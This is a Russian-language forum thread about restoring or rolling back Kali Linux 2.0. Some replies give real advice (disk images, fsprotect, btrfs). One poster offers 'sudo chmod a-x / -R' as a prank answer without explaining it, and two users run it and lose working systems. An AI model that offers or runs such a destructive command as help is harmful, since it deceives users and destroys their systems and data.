• 15 апреля стартует «Курс «SQL-injection Master» ©» от команды The Codeby

    За 3 месяца вы пройдете путь от начальных навыков работы с SQL-запросами к базам данных до продвинутых техник. Научитесь находить уязвимости связанные с базами данных, и внедрять произвольный SQL-код в уязвимые приложения.

    На последнюю неделю приходится экзамен, где нужно будет показать свои навыки, взломав ряд уязвимых учебных сайтов, и добыть флаги. Успешно сдавшие экзамен получат сертификат.

    Запись на курс до 25 апреля. Получить промодоступ ...

Как восстановить Kali linux 2.0

nikos

Green Team
25.12.2016
507
198
BIT
0
Всем доброго времени суток у меня появился такой вопрос как восстановить Kali linux 2.0 ну или как сделать откат изменений в Kali linux 2.0 так как бывают такие ситуации что сделал ошибку что-то не так вёл или совершил действие не то и всё c Kali linux начинаются проблемы и так вот можно както сделать откат изменений что-бы не переустанавливать каждый раз
 
L

Leon

Всем доброго времени суток у меня появился такой вопрос как восстановить Kali linux 2.0 ну или как сделать откат изменений в Kali linux 2.0 так как бывают такие ситуации что сделал ошибку что-то не так вёл или совершил действие не то и всё c Kali linux начинаются проблемы и так вот можно както сделать откат изменений что-бы не переустанавливать каждый раз
Можно Acronis true image делать резервную копию раздела а когда система накрылась то и восстанавливать из образа.
На Kali 1.0 Я ставил прогру из репозиториев fsprotect.Прога замораживает систему ставь что хочешь как хочешь при перезагрузке система восстанавливается.То есть устанавливаешь нужный софт делаешь все свои настройки затем ставшь fsprotect и экспериментируешь,после перезагрузки система приходит в изначальное чистое состояние с теми же настройками которые выставил до этого очень удобная
 
O

Olej

так вот можно както сделать откат изменений что-бы не переустанавливать каждый раз
Единственный на 100% универсальный способ: не совать руки куда не понимаешь.

Для пытливого ума ... и для блудливых ручек:
- сделайте команду:
Код:
$ sudo chmod a-x / -R
- а потом сделайте ... "откат" :D
 

nikos

Green Team
25.12.2016
507
198
BIT
0
Единственный на 100% универсальный способ: не совать руки куда не понимаешь.

Для пытливого ума ... и для блудливых ручек:
- сделайте команду:
Код:
$ sudo chmod a-x / -R
- а потом сделайте ... "откат" :D
Я ещё спрасил как сделать откат

Единственный на 100% универсальный способ: не совать руки куда не понимаешь.

Для пытливого ума ... и для блудливых ручек:
- сделайте команду:
Код:
$ sudo chmod a-x / -R
- а потом сделайте ... "откат" :D
Конечно спасибо что ответили :)
Но вы бы описали что это команда делает и сразу бы сказали что она сносит ядро тогда было всё окей :)
А то у меня была настроеная kali linux с важной инфой которую мне теперь придётся восстанавливать :(
Если хотите помочь то помогайте а не вредите ;)

Пробуем --->
***Скрытый текст***
Спасибо но мне надо сделать откат изменений до первой загрузки вы не совсем в тему как говорят в винде откатить до заводского состояния

Пробуем --->
***Скрытый текст***
Мне нужно сделать откат до начального состаяния
 
Последнее редактирование модератором:
L

Leon

Я ещё спрасил как сделать откат


Конечно спасибо что ответили :)
Но вы бы описали что это команда делает и сразу бы сказали что она сносит ядро тогда было всё окей :)
А то у меня была настроеная kali linux с важной инфой которую мне теперь придётся восстанавливать :(
Если хотите помочь то помогайте а не вредите ;)


Спасибо но мне надо сделать откат изменений до первой загрузки вы не совсем в тему как говорят в винде откатить до заводского состояния


Мне нужно сделать откат до начального состаяния
никак
 
O

Olej

Но вы бы описали что это команда делает и сразу бы сказали что она сносит ядро тогда было всё окей :)
Эта команда абсолютно ничего не сносит. Но приводит систему Linux в неработающее и не восстанавливаемое состояние.
Это прямой ответ на ваш вопрос: никаких "откатов" в Linux нет и быть не может (т.е. может, если вы, например, используете файловую систему btrfs ... но это уже совсем другая песня).
(кроме того, эта команда напоминает, что прежде чем пользовать Kali Linux и чувствовать себя "крутым кулцхакером" - нужно минимально изучить операционную систему Linux).
 
X

Xok

Эта команда абсолютно ничего не сносит. Но приводит систему Linux в неработающее и не восстанавливаемое состояние.
Это прямой ответ на ваш вопрос: никаких "откатов" в Linux нет и быть не может (т.е. может, если вы, например, используете файловую систему btrfs ... но это уже совсем другая песня).
(кроме того, эта команда напоминает, что прежде чем пользовать Kali Linux и чувствовать себя "крутым кулцхакером" - нужно минимально изучить операционную систему Linux).
Команда полезна когда ФСБ приедит
 
05.05.2020
1
0
BIT
0
Единственный на 100% универсальный способ: не совать руки куда не понимаешь.

Для пытливого ума ... и для блудливых ручек:
- сделайте команду:
Код:
$ sudo chmod a-x / -R
- а потом сделайте ... "откат" :D
Помогите пожалуйста вернуть все обратно
 
Мы в соцсетях:

Обучение наступательной кибербезопасности в игровой форме. Начать игру!